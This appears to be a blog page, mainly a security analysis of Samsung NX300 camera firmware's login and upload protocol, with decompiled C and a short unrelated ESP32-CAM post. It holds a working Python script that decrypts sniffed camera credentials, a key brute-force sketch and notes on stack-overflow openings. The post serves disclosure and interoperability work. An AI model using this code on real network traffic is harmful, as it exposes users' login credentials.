Web_Get_Encrypted_Pw(); /* encrypt password into gWeb.enc_pw */
Web_Get_Camera_CryptKey(); /* encrypt keyspec into gWeb.encrypted_session_key */
URLEncode(&encrypted_session_key,gWeb.encrypted_session_key);
if (site_idx == /*5*/ SITE_SAMSUNGIMAGING || site_idx == /*6*/ SITE_CYWORLD) {
WebMakeDataWithOAuth(out_http_request);
} else if (site_idx == /*14*/ SITE_KAKAOSTORY) {
/* snip HTTP POST with unencrypted credentials to sandbox-auth.kakao.com */
} else {
/* snip and postpone HTTP POST with XML payload to snsgw.samsungmobile.com */
}
}
From there, Web_Encrypt_Init() is called to reset the gWeb fields, to obtain a new (symmetric) encryption key, and to encrypt the application_key:
bool Web_Encrypt_Init(void) {
char buffer[128];
memset(gWeb.keyspec,0,64);
memset(gWeb.encrypted_application_key,0,128);
memset(gWeb.enc_id,0,64);
memset(gWeb.enc_pw,0,64);
memset(gWeb.encrypted_session_key,0,512);
memset(gWeb.duid,0,64);
generateKeySpec(&gWeb.keyspec);
dataEncrypt(&buffer,gWeb.application_key,gWeb.keyspec);
URLEncode(&gWeb.encrypted_application_key,buffer);
}
We remember the very interesting generateKeySpec() and dataEncrypt() functions for later analysis.
WebMakeLoginData() also calls Web_Get_Encrypted_Id() and Web_Get_Encrypted_Pw() to obtain the encrypted (and base64-encoded) username and password. Those follow the same logic of dataEncrypt() plus URLEncode() to store the encrypted values in the respective gWeb fields as well.
bool Web_Get_Encrypted_Pw() {
char buffer[128];
memset(gWeb.enc_pw,0,64);
dataEncrypt(&buffer,gWeb.password,gWeb.keyspec);
URLEncode(&gWeb.enc_pw,buffer);
}
Interestingly, we are using a 128-byte intermediate buffer for the encryption result, and URL-encoding it into a 64-byte destination field. However, gWeb.password is only 32 bytes, so we are hopefully safe here. Nevertheless, there are no range checks in the code.
Finally, it calls Web_Get_Camera_CryptKey() to RSA-encrypt the generated keyspec and store it in gWeb.encrypted_session_key. The actual encryption is done by encryptSessionKey(&gWeb.encrypted_session_key,gWeb.keyspec), which we should also look into.
Generating the secret key: generateKeySpec()
That function is as straightforward as can be: it requests two blocks of random data into a 32-byte array and returns the base64-encoded result:
int generateKeySpec(char **out_keyspec) {
char rnd_buffer[32];
int result;
char *rnd1 = _secureRandom(&result);
char *rnd2 = _secureRandom(&result);
memcpy(rnd_buffer, rnd1, 16);
memcpy(rnd_buffer+16, rnd2, 16);
char *b64_buf = String_base64Encode(rnd_buffer,32,&result);
*out_keyspec = b64_buf;
}
(In)secure random number generation: _secureRandom()
It's still worth looking into the source of randomness that we are using,
which hopefully should be /dev/random
or at least /dev/urandom
, even on an
ancient Linux system:
char *_secureRandom(int *result)
{
srand(time(0));
char *target = String_new(20,result);
String_format(target,20,"%d",rand());
target = _sha1_byte(target,result);
return target;
}
WAIT WHAT?! Say that again, slowly! You are initializing the libc pseudo-random number generator with the current time, with one-second granularity, then getting a "random" number from it somewhere between 0 and RAND_MAX = 2147483647, then printing it into a string and calculating a 20-byte SHA1 sum of it?!?!?!
Apparently, the Samsung engineers never heard of the Debian OpenSSL random number generator debacle, or they considered imitating it a good idea?
The entropy of this function depends only on how badly the user maintains the camera's clock, and can be expected to be about six bits (you can only set minutes, not seconds, in the camera), instead of the 128 bits required.
Calling this function twice in a row will almost always produce the same insecure block of data.
The function name _sha1_byte() is confusing as well: why is it a singular byte, and why is there no length parameter?
char *_sha1_byte(char *buffer, int *result) {
int len = strlen(buffer);
char *shabuf = malloc(20);
int hash_len = 20;
memset(shabuf,0,hash_len);
SecCrHash(shabuf,&hash_len);
return shabuf;
}
That looks plausible, right? We just assume that buffer is a NUL-terminated string (the string we pass from _secureRandom() is one), and then we... don't pass it into the SecCrHash() function? We only pass the virgin 20-byte target array to write the hash into? The hash of what?
int SecCrHash(void *dst, int *out_len) {
char buf [20];
*out_len = 20;
memcpy(dst, buf, *out_len);
return 0;
}
It turns out that the SecCrHash function (secure cryptographic hash?) is not hashing anything, and it's not processing any input; it's just copying 20 bytes of uninitialized data from the stack to the destination buffer. So instead of returning an obfuscated timestamp, we are returning some (even more deterministic) data that previous function calls worked with.
Well, from an attacker's point of view, this actually makes cracking the key (slightly) harder: we can't just fuzz around the current time, we need to actually get an understanding of the calls happening before that and see what kind of data they can leave on the stack.
SPOILER: No, we don't have to. Samsung helpfully leaked the symmetric encryption key for us. But let's still finish this arc and see what else we can find. Skip to the encryption key leak.
Encrypting values: dataEncrypt()
The secure key material in gWeb.keyspec is passed to dataEncrypt() to actually encrypt strings:
int dataEncrypt(char **out_enc_b64, char *message, char *key_b64) {
int result;
char *keyspec;
String_base64Decode(key_b64,&keyspec,&result);
char key[16];
char iv[16];
memcpy(key, keyspec, 16);
memcpy(iv, keyspec+16, 16);
return _aesEncrypt(message, key, iv, &result);
}
char *_aesEncrypt(char *message, char *key, char *iv, int *result) {
int bufsize = (strlen(message) + 15) & ~15; /* round up to block size */
char *enc_data = malloc(bufsize);
SecCrEncryptBlock(&enc_data,&bufsize,message,bufsize,key,16,iv,16);
char *ret_buf = String_base64Encode(enc_data,bufsize,result);
free(enc_data);
return ret_buf;
}
The _aesEncrypt() function is calling SecCrEncryptBlock() and base64-encoding the result. From SecCrEncryptBlock() we have calls into NAT_CipherInit() and NAT_CipherUpdate() that are initializing a cipher context, copying key material, and passing all calls through function pointers in the cipher context, but it all boils down to doing standard AES-CBC, with the first half of keyspec used as the encryption key, the second half as the IV, and the (initial) IV being the same for all dataEncrypt() calls.
The prefixes SecCr and NAT imply that some crypto library is in use, but there are no obvious results on Google or GitHub, and the function names are mostly self-explanatory.
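For reference, here is dataEncrypt() redone in Python as a sketch (the zero-padding to the AES block size is an assumption; the camera additionally URL-encodes the base64 result before putting it into the XML):

from base64 import b64decode, b64encode
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def data_encrypt(message: bytes, keyspec_b64: str) -> str:
    keyspec = b64decode(keyspec_b64)
    key, iv = keyspec[:16], keyspec[16:32]   # first half = key, second half = IV
    padded = message + b'\x00' * (-len(message) % 16)
    e = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return b64encode(e.update(padded) + e.finalize()).decode()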
Encrypting the secret key: encryptSessionKey()
This function will decode the base64-encoded 32-byte keyspec, and encrypt it with a hard-coded RSA key:
int encryptSessionKey(char **out_rsa_enc,char *keyspec)
{
int result;
char *keyspec_raw;
int keyspec_raw_len = String_base64Decode(keyspec,&keyspec_raw,&result);
char *dst = _rsaEncrypt(keyspec_raw,keyspec_raw_len,
"0x8ae4efdc724da51da5a5a023357ea25799144b1e6efbe8506fed1ef12abe7d3c11995f15
dd5bf20f46741fa7c269c7f4dc5774ce6be8fc09635fe12c9a5b4104a890062b9987a6b6d69
c85cf60e619674a0b48130bb63f4cf7995da9f797e2236a293ebc66ee3143c221b2ddf239b4
de39466f768a6da7b11eb7f4d16387b4d7",
"0x10001",&result);
*out_rsa_enc = dst;
}
The _rsaEncrypt() function is using the BigDigits multiple-precision arithmetic library to add PKCS#1 v1.5 padding to the keyspec, encrypt it with the supplied m and e values, and return the encrypted value. The result is a long hex number string like the one we can see in the <Request/> PCAP above.
Completing the HTTP POST: WebMakeLoginData() contd.
Now that we have all the cryptographic ingredients together, we can return to actually crafting the HTTP request.
There are three different code paths taken by WebMakeLoginData(): one into WebMakeDataWithOAuth() for the samsungimaging and cyworld sites, one creating an x-www-form-urlencoded HTTP POST to sandbox-auth.kakao.com, and one creating the XML <Request/> we've seen in the packet trace for all other social networks. Given the obscurity of the first three networks, we'll focus on the last code path:
WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
WebString_Add_fmt(body,"%s%s%s",
"<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\"",
encrypted_session_key,"\">\r\n");
if (site_idx != /*34*/ SITE_SKYDRIVE) {
WebString_Add_fmt(body,"%s%s%s","<UserName Value=\"",gWeb.enc_id,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s","<Password Value=\"",gWeb.enc_pw,"\"/>\r\n");
}
WebString_Add_fmt(body,"%s%s%s","<PersistKey Use=\"true\"/>\r\n",duid,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s","<SessionKey Type=\"APIF\"/>","\r\n");
WebString_Add_fmt(body,"%s%s%s","<CryptSessionKey Use=\"true\" Type=\"SHA1\" Value=\"",
gWeb.keyspec,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s","<ApplicationKey Value=\"",gWeb.application_key,
"\"/>\r\n");
WebString_Add_fmt(body,"%s%s","</Request>","\r\n");
body_len = strlen(body);
WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/auth HTTP/1.1","\r\n");
WebString_Add_fmt(header,"%s%s%s","Host: ",host,"\r\n");
WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
WebAddString(out_http_request, header);
WebAddString(out_http_request, body);
Okay, so generating XML via a fancy sprintf() has been frowned upon for a long time. However, if done correctly, and if there is no attacker-controlled input with escape characters, this can be an acceptable approach.
In our case, the duid is surrounded by closing tags due to an obvious programmer error, but beyond that, all parameters are properly controlled by encoding them in hex, in base64, or in URL-encoded base64.
We are transmitting the RSA-encrypted session key (as CameraCryptKey), the AES-encrypted username and password (except when uploading to SkyDrive), the duid (outside of a valid XML element), the application_key that we encrypted earlier (but we are sending the unencrypted variable), and the keyspec in the CryptSessionKey element.
The keyspec? Isn't that the secret AES key? Well yes, it is. All that RSA code turns out to be a red herring; we get the encryption key on a silver platter!
Decrypting the sniffed login credentials
Can it be that easy? Here's a minimal proof-of-concept in python:
#!/usr/bin/env python3
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from base64 import b64decode
from urllib.parse import unquote
import xml.etree.ElementTree as ET
import sys

def decrypt_string(key, s):
    d = Cipher(algorithms.AES(key[0:16]), modes.CBC(key[16:])).decryptor()
    plaintext = d.update(s)
    return plaintext.decode('utf-8').rstrip('\0')

def decrypt_credentials(xml):
    x_csk = xml.find("CryptSessionKey")
    x_user = xml.find("UserName")
    x_pw = xml.find("Password")
    key = b64decode(x_csk.attrib['Value'])
    enc_user = b64decode(unquote(x_user.attrib['Value']))
    enc_pw = b64decode(unquote(x_pw.attrib['Value']))
    return (key, decrypt_string(key, enc_user), decrypt_string(key, enc_pw))

def decrypt_file(fn):
    key, user, pw = decrypt_credentials(ET.parse(fn).getroot())
    print('User:', user, 'Password:', pw)

for fn in sys.argv[1:]:
    decrypt_file(fn)
If we pass the earlier <Request/> XML to this script, we get this:
User: x Password: z
Looks like somebody couldn't be bothered to touch-tap-type long values.
Now we can also see what kind of garbage stack data is used as the encryption keys.
On the NX300, the results confirm our analysis: this looks very much like stack garbage, with minor variations between _secureRandom() calls:
00000000: ffff ffff f407 a5b6 5201 0000 fc03 aeb6 ........R.......
00000010: ffff ffff 4872 0fb6 5201 0000 0060 0fb6 ....Hr..R....`..
00000000: ffff ffff f487 9ab6 5201 0000 fc83 a3b6 ........R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6 ....H...R.......
00000000: ffff ffff 48a2 04b6 5201 0000 0090 04b6 ....H...R.......
00000010: ffff ffff 48a2 04b6 5201 0000 0090 04b6 ....H...R.......
00000000: ffff ffff f4a7 9ab6 5201 0000 fca3 a3b6 ........R.......
00000010: ffff ffff 4812 05b6 5201 0000 0000 05b6 ....H...R.......
00000000: ffff ffff f4b7 99b6 5201 0000 fcb3 a2b6 ........R.......
00000010: ffff ffff 4822 04b6 5201 0000 0010 04b6 ....H"..R.......
00000000: ffff ffff 48f2 04b6 5201 0000 00e0 04b6 ....H...R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6 ....H...R.......
On the NX mini, the data looks much more random, but consistently key == iv, suggesting that it is actually a sort of sha1(rand()):
00000000: 00e0 fdcd e5ae ea50 a359 8204 03da f992 .......P.Y......
00000010: 00e0 fdcd e5ae ea50 a359 8204 03da f992 .......P.Y......
00000000: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7 .$...\...ou.>...
00000010: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7 .$...\...ou.>...
00000000: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412 ....\...,..6....
00000010: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412 ....\...,..6....
00000000: d1df 767e eb51 bd40 96d0 3c89 1524 a61c ..v~.Q.@..<..$..
00000010: d1df 767e eb51 bd40 96d0 3c89 1524 a61c ..v~.Q.@..<..$..
00000000: d757 4c46 d96d 262f a986 3587 7d29 7429 .WLF.m&/..5.})t)
00000010: d757 4c46 d96d 262f a986 3587 7d29 7429 .WLF.m&/..5.})t)
00000000: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a .V.A.........V.z
00000010: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a .V.A.........V.z
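On the NX mini, then, the keyspec really seems to be a truncated sha1(str(rand())), reused as both key and IV, so a passive attacker does not even need the leaked CryptSessionKey discussed below: the seed space is tiny. A hedged sketch of such a brute force, calling glibc's rand() via ctypes (the plausibility check and time window are assumptions):

import hashlib
from ctypes import CDLL
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

libc = CDLL("libc.so.6")

def candidate_key(ts):
    # what _secureRandom() apparently amounts to on the NX mini:
    # seed with a timestamp, take the SHA1 of the decimal rand() value
    libc.srand(ts)
    return hashlib.sha1(str(libc.rand()).encode()).digest()[:16]

def brute_force(enc_user, pcap_time, window=3600):
    for ts in range(pcap_time - window, pcap_time + 1):
        key = candidate_key(ts)
        d = Cipher(algorithms.AES(key), modes.CBC(key)).decryptor()
        plain = (d.update(enc_user) + d.finalize()).rstrip(b'\x00')
        if plain and plain.isascii():   # crude plausibility check
            yield ts, plain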
Social media login response
The HTTP POST request is passed to WebOperateLogin(), which will create a TCP socket to port 80 of the target host, send the request and receive the response into a 2KB buffer:
bool WebOperateLogin(int sock_idx,char *buf,ulong site_idx) {
int buflen = strlen(buf);
SendTCPSocket(sock_idx,buf,buflen,0,false,0,0);
rx_buf = malloc(2048);
int rx_size = ReceiveTCPProcess(sock_idx,rx_buf,300);
bool login_result = WebCheckLogin(rx_buf,site_idx);
}
The TCP process (actually just a pthread) will clear the buffer and read up to 2047 bytes, ensuring a NUL-terminated result. The response is then "parsed" to extract success / failure flags.
Parsing the login response: WebCheckLogin()
The HTTP response (header plus body) is then searched for certain "XML" "fields" to parse out relevant data:
bool WebCheckLogin(char *buf,int site_idx) {
char value[512];
memset(value,0,512);
if (GetXmlString(buf,"ErrCode",value)) {
strcpy(gWeb.ErrCode,value); /* gWeb.ErrCode is 16 bytes */
if (!GetXmlString(buf, "ErrSubCode",value))
return false;
strcpy(gWeb.SubErrCode,value); /* gWeb.SubErrCode is also 16 bytes */
return false;
}
if (!GetXmlString(buf,"Response SessionKey",value))
return false;
strcpy(gWeb.response_session_key,value); /* ... 64 bytes */
memset(value,0,512);
if (!GetXmlString(buf,"PersistKey Value",value))
return false;
strcpy(gWeb.persist_key,value); /* ... 64 bytes */
memset(value,0,512);
if (!GetXmlString(buf,"CryptSessionKey Value",value))
return false;
memset(gWeb.keyspec,0,64);
strcpy(gWeb.keyspec,value); /* ... 64 bytes */
if (site_idx == /*34*/ SITE_SKYDRIVE) {
strcpy(gWeb.LoginPeopleID, "owner");
} else {
memset(value,0,512);
if (!GetXmlString(buf,"LoginPeopleID",value)) {
return false;
}
}
strcpy(gWeb.LoginPeopleID,value); /* ... 128 bytes */
if (site_idx == /*34*/ SITE_SKYDRIVE) {
memset(value,0,512);
if (!GetXmlString(buf,"OAuth URL",value))
return false;
ReplaceString(value,"&amp;","&",skydriveURL);
}
return true;
}
The GetXmlString() function name is actually quite a euphemism. It does not actually parse XML. Instead, it searches for the first verbatim occurrence of the passed field name, including the verbatim whitespace, checks that it's followed by a colon or an equals sign, and then copies everything between the following quotes into out_value. It does not check the buffer bounds, and doesn't ensure NUL-termination, so the caller has to clear the buffer each time (which it doesn't do consistently):
bool GetXmlString(char *xml,char *field,char *out_value) {
char *position = strstr(xml, field);
if (!position)
return false;
int field_len = strlen(field);
char *field_end = position + field_len;
/* snip some decompile that _probably_ checks for a '="' or ':"' postfix at field_end */
char *value_begin = position + field_len + 2;
char *value_end = strstr(value_begin,"\"");
if (!value_end)
return false;
memcpy(out_value, value_begin, value_end - value_begin);
return true;
}
Given that the XML buffer is 2047 bytes controlled by the attacker (well, the server operator), and value is a 512-byte buffer on the stack, this calls for some happy smashing!
The ErrCode and ErrSubCode are passed to the UI application, and probably processed according to some look-up tables / error code tables, which are subject to reverse engineering by somebody else. Valid error codes seem to be: 4019 ("invalid grant" from kakaostory), 8001, 9001, 9104.
Logging out
The auth endpoint is also used for logging out from the camera (this feature is well-hidden: you need to switch the camera to "Wi-Fi" mode, enter the respective social network, and then press the 🗑 trash-bin key):
<Request Method="logout" SessionKey="pmlyFu8MJfAVs8ijyMli" CryptKey="ca02890e42c48943acdba4e782f8ac1f20caa249">
</Request>
Writing a minimal auth handler
For the positive case, a few elements need to be present in the response XML. A valid example for that is response-login.xml:
<Response SessionKey="{{ sessionkey }}">
<PersistKey Value="{{ persistkey }}"/>
<CryptSessionKey Value="{{ cryptsessionkey }}"/>
<LoginPeopleID="{{ screenname }}"/>
<OAuth URL="http://snsgw.samsungmobile.com/oauth"/>
</Response>
The camera will persist the SessionKey value and pass it to later requests. It will also remember the user as "logged in" and skip the /auth/ endpoint in the future. It is unclear yet how to reset that state from the API side to allow a new login (maybe it needs the right ErrCode value?).
A negative response would go along these lines:
<Response ErrCode="{{ errcode }}" ErrSubCode="{{ errsubcode }}" />
And here is the respective Flask handler PoC:
@app.route('/<string:site>/auth',methods = ['POST'])
def auth(site):
    xml = ET.fromstring(request.get_data())
    method = xml.attrib["Method"]
    if method == 'logout':
        return "Logged out for real!"
    keyspec, user, password = decrypt_credentials(xml)
    # TODO: check credentials
    return render_template('response-login.xml',
                           sessionkey=mangle_address(user),
                           screenname="Samsung NX Lover")
Uploading pictures
After a successful login, the camera will actually start uploading files with WebUploadImage(). For each file, either the /facebook/photo or the /facebook/video endpoint is called with another XML request, followed by an HTTP PUT of the actual content.
bool WebUploadImage(int ui_ctx,int site_idx,int picType) {
if (site_idx == /*14*/ SITE_KAKAOSTORY) {
/* snip very long block handling kakaostory */
return true;
}
/* iterate over all files selected for upload */
for (int i = 0; i < gWeb.selected_count; i++) {
gWeb.file_path = upload_file_names[i];
gWeb.index = i+1;
char *buf = malloc(2048);
WebMakeUploadingMetaData(buf,site_idx);
WebOperateMetaDataUpload(site_idx,0,buf);
WebOperateUpload(0,picType);
}
return true;
}
Upload request: WebOperateMetaDataUpload()
The image metadata is prepared by WebMakeUploadingMetaData() and sent by WebOperateMetaDataUpload(). The (user-editable) facebook folder name is properly XML-escaped:
bool WebMakeUploadingMetaData(char *out_http_request,int site_idx) {
/* snip hostname selection similar to WebMakeLoginData */
if (strstr(gWeb.file_path, "JPG") != NULL) {
WebParseFileName(gWeb.file_path,gWeb.file_name);
/* "authenticate" the request by SHA1'ing some static secrets */
char header_for_sig[256];
sprintf(header_for_sig,"/%s/photo.upload*%s#%s:%s",gWeb.site,
gWeb.persist_key,gWeb.response_session_key,gWeb.keyspec);
char *crypt_key = sha1str(header_for_sig);
body = WebMalloc(2048);
WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
WebString_Add_fmt(body,"%s%s%s%s%s",
"<Request Method=\"upload\" Timeout=\"3000\" SessionKey=\"",
gWeb.response_session_key,"\" CryptKey=\"",crypt_key,"\">\r\n");
WebString_Add_fmt(body,"%s%s","<Photo>","\r\n");
if (site_idx == /*1*/ SITE_FACEBOOK) {
char *folder = xml_escape(gWeb.facebook_folder);
WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"",folder,"\"/>\r\n");
} else
WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"","Samsung Smart Camera","\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s%s","<File Name=\"",gWeb.file_name,"\"/>","\r\n")
if (site_idx != /*9*/ SITE_WEIBO) {
WebString_Add_fmt(body,"%s%s%s%s","<Content><![CDATA[",gWeb.description,"]\]></Content>","\r\n");
}
WebString_Add_fmt(body,"%s%s","</Photo>","\r\n");
WebString_Add_fmt(body,"%s%s","</Request>","\r\n");
body_len = strlen(body);
WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/photo HTTP/1.1","\r\n");
WebString_Add_fmt(header,"%s%s%s","Host: ",hostname,"\r\n");
WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
strcat(header,body);
strcpy(out_http_request,header);
return true;
}
if (strstr(gWeb.file_path, "MP4") != NULL) {
/* analogous to picture upload, but for video */
} else
return false; /* wrong file type */
}
bool WebOperateMetaDataUpload(int site_idx,int sock_idx,char *buf) {
/* snip hostname selection similar to WebMakeLoginData */
bool result = WebSocketConnect(sock_idx,hostname,80);
if (result) {
SendTCPSocket(sock_idx,buf,strlen(buf),0,false,0,0);
response = malloc(2048);
ReceiveTCPProcess(sock_idx,response,300);
return WebCheckRequest(response);
}
return false;
}
The generated XML looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<Request Method="upload" Timeout="3000" SessionKey="deadbeef" CryptKey="4f69e3590858b5026508b241612a140e2e60042b">
<Photo>
<Album ID="" Name="Samsung Smart Camera"/>
<File Name="SAM_9838.JPG"/>
<Content><![CDATA[Upload test message.]]></Content>
</Photo>
</Request>
Upload response: WebCheckRequest()
The server response is checked by WebCheckRequest():
bool WebCheckRequest(char *xml) {
/* check for HTTP 200 OK, populate ErrCode and ErrSubCode on error */
if (!GetXmlResult(xml))
return false;
memset(web->HostAddr,0,64); /* 64 byte buffer */
memset(web->ResourceID,0,128); /* 128 byte buffer */
GetXmlString(xml,"HostAddr",web->HostAddr);
GetXmlString(xml,"ResourceID",web->ResourceID);
return true;
}
Thus the server needs to return an (arbitrary) XML element that has the two attributes HostAddr and ResourceID, which are stored in the gWeb struct for later use. As always, there are no range checks (but those fields are in the middle of the struct, so maybe not the best place to smash).
Actual media upload: WebOperateUpload()
The code is pretty straightforward: it creates a buffer with the (downscaled or original) media file, makes an HTTP PUT request to the host and resource obtained earlier, and submits that to the server:
bool WebOperateUpload(int sock_idx,ulong picType) {
char hostname[128];
memset(hostname,0,128);
WebParseIP(gWeb.HostAddr,hostname); /* not required to be an IP */
int port = WebParsePort(gWeb.HostAddr);
if (!WebSocketConnect(sock_idx,hostname,port))
return false;
char *file_buffer_ptr;
int file_size;
char *request = WebMalloc(2048);
WebMakeUploadingData(request,&file_buffer_ptr,&file_size,picType);
if (WebUploadingData(sock_idx,request,file_buffer_ptr,file_size)) {
if (strstr(gWeb.file_path,"JPG") || strstr(gWeb.file_path, "MP4"))
WebFree(file_buffer_ptr);
WebSocketClose(sock_idx);
}
}
bool WebMakeUploadingData(char *out_http_request,char **file_buffer_ptr,int *file_size_ptr,ulong picType) {
request = WebMalloc(512);
if (strstr(gWeb.file_path,"JPG")) {
/* scale down or send original image */
if (picType == 0) {
int megapixels = 2;
if (strcmp(gWeb.site, "facebook") == 0)
megapixels = 1;
NASLWifi_jpegResizeInMemory(gWeb.file_path,megapixels,file_buffer_ptr,file_size_ptr);
} else
NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
} else if (strstr(gWeb.file_path,"MP4")) {
NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
}
WebString_Add_fmt(request,"%s%s%s%s","PUT /",gWeb.ResourceID," HTTP/1.1","\r\n");
if (strstr(gWeb.file_path,"JPG")) {
WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
} else if (strstr(gWeb.file_path,"MP4")) {
/* copy-paste-fail? should be video... */
WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
}
WebString_Add_fmt(request,"%s%d%s","Content-Length: ",*file_size_ptr,"\r\n");
WebString_Add_fmt(request,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(request,"%s%d/%d%s","Content-Range: bytes 0-",*file_size_ptr - 1,
*file_size_ptr,"\r\n");
WebString_Add_fmt(request,"%s%s%s","Host: ",gWeb.HostAddr,"\r\n\r\n");
strcpy(out_http_request,request);
}
The actual upload function WebUploadingData() operates in a straightforward way: it will send the request buffer and the file buffer, and check for an HTTP 200 OK response or for the presence of ErrCode and ErrSubCode.
Writing an upload handler
We need to implement a /<site>/photo
handler that returns an (arbitrary)
upload path and a PUT
handler that will process files on that path.
The upload path will be served using this XML (the hostname is hardcoded
because we already had to hijack the snsgw
hostname anyway):
<Response HostAddr="snsgw.samsungmobile.com:80" ResourceID="upload/{{ sessionkey }}/{{ filename }}" />
Then we have the two API endpoints:
@app.route('/<string:site>/photo',methods = ['POST'])
def photo(site):
    xml = ET.fromstring(request.get_data())
    # TODO: check session key
    sessionkey = xml.attrib["SessionKey"]
    photo = xml.find("Photo")
    filename = photo.find("File").attrib["Name"]
    # we just pass the sessionkey into the upload URL
    return render_template('response-upload.xml', sessionkey=sessionkey, filename=filename)

@app.route('/upload/<string:sessionkey>/<string:filename>', methods = ['PUT'])
def upload(sessionkey, filename):
    d = request.get_data()
    # TODO: check session key
    store = os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(sessionkey))
    os.makedirs(store, exist_ok = True)
    fn = os.path.join(store, secure_filename(filename))
    with open(fn, "wb") as f:
        f.write(d)
    return "Success!"
Conclusion
Samsung implemented this service back in 2009, when mandatory SSL (or TLS) wasn't a thing yet. They showed intent to properly secure users' credentials by applying state-of-the-art symmetric and asymmetric encryption instead. However, the insecure (commented out?) random key generation algorithm was not suitable for the task, and even if it had been, the secret key was transmitted as part of the message anyway. A passive attacker listening on the traffic between Samsung cameras and their API servers was able to obtain the AES key and thus decrypt the user credentials.
In this post, we have analyzed the client-side code of the NX300 camera, and re-created the APIs as part of the samsung-nx-emailservice project.
This post is about shooting 16-color EGA (1984) styled retro photos right on the 4$ ESP32-CAM board and storing them to µSD in the arcane TGA (1984) file format.
For that, we need to read RGB images, convert them to 16 colors, apply dithering, and store a TGA image file.
ESP32-EGA16-TGA source code on GitHub.
Introduction
This year's Shitty Camera Challenge has some space for digital cameras, and so the author experimented with different devices. The last one, the ESP32-CAM, was obtained after the HomeAssistant setup wizard promised an easy way to monitor analog utility meters with camera and AI, and what could be shittier than a 4$ camera PCB?
ESP32-CAM
The ESP32-CAM turned out to be even shittier than anticipated. Of the four sensors ordered, three had visible defects. The image quality is green. The board pinout is ridiculous, with the LED flash wired to the SD data line, the PCB LED blocking WiFi, and no fully usable GPIOs.
Still, the ESP32 is quite a beefy beast for an embedded SoC, with a 240MHz 32-bit core and ~500KB of SRAM on die, plus some 4MB of PSRAM on the board to store camera pictures. The pictures can be streamed over WiFi or stored to a µSD card, giving us some flexibility.
The CPU and memory specs are far beyond 1980s desktop computers, so we are not limited in the choice of algorithms to perform our task, and we can easily cheat where needed.
The platform is supported by Arduino IDE and by PlatformIO, typically programmed in C/C++, and there are example projects to implement a webcam or to take pictures to µSD.
Reading RGB data from the sensor into memory
The camera API supports various streaming formats, from pre-compressed JPEG to RAW:
typedef enum {
PIXFORMAT_RGB565, // 2BPP/RGB565
PIXFORMAT_YUV422, // 2BPP/YUV422
PIXFORMAT_YUV420, // 1.5BPP/YUV420
PIXFORMAT_GRAYSCALE, // 1BPP/GRAYSCALE
PIXFORMAT_JPEG, // JPEG/COMPRESSED
PIXFORMAT_RGB888, // 3BPP/RGB888
PIXFORMAT_RAW, // RAW
PIXFORMAT_RGB444, // 3BP2P/RGB444
PIXFORMAT_RGB555, // 3BP2P/RGB555
} pixformat_t;
The easiest format for us to process is RGB888, with one byte for each of the three colors, stored in a two-dimensional pixel array. Except when the API is a lie:
E (1195) esp32 ll_cam: Requested format is not supported
Luckily, the github-actions bot closed the issue as completed, so it's solved, right? RIGHT??? The error message comes from ll_cam_set_sample_mode(), and its source code reveals that the actually implemented options are:
PIXFORMAT_GRAYSCALE
PIXFORMAT_YUV422
PIXFORMAT_JPEG
PIXFORMAT_RGB565
Greyscale gives us one brightness byte per pixel, but we want to have colors. YUV422 stores two pixels in four bytes and requires a color space conversion. JPEG requires that as well, but only after parsing and uncompressing the JPEG file. RGB565 stores one pixel in two bytes, with five bits for red and blue, respectively, and six bits for green. That gives us enough headroom to do some dithering for a 16-color palette and spares us from non-linear luminance and chrominance formulas.
Furthermore, RGB565 can be converted to RGB888 with just a bit of bit shifting, so there we go. We configure the camera to take images in QVGA (320x240, close enough to the EGA 320x200 original) into PSRAM:
camera_config_t config;
/* ... snip boilerplate ... */
config.pixel_format = PIXFORMAT_RGB565;
config.frame_size = FRAMESIZE_QVGA;
config.fb_location = CAMERA_FB_IN_PSRAM;
esp_camera_init(&config);
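As an aside, the RGB565 to RGB888 expansion mentioned above really is just a few shifts per channel; a sketch in Python for illustration (the firmware does the equivalent in C, and the buffer is big-endian, cf. the rgb565be in the ffmpeg call below):

def rgb565_to_rgb888(hi, lo):
    v = (hi << 8) | lo                       # big-endian: high byte first
    r5, g6, b5 = (v >> 11) & 0x1F, (v >> 5) & 0x3F, v & 0x1F
    # replicate the top bits into the low bits to fill the full 0..255 range
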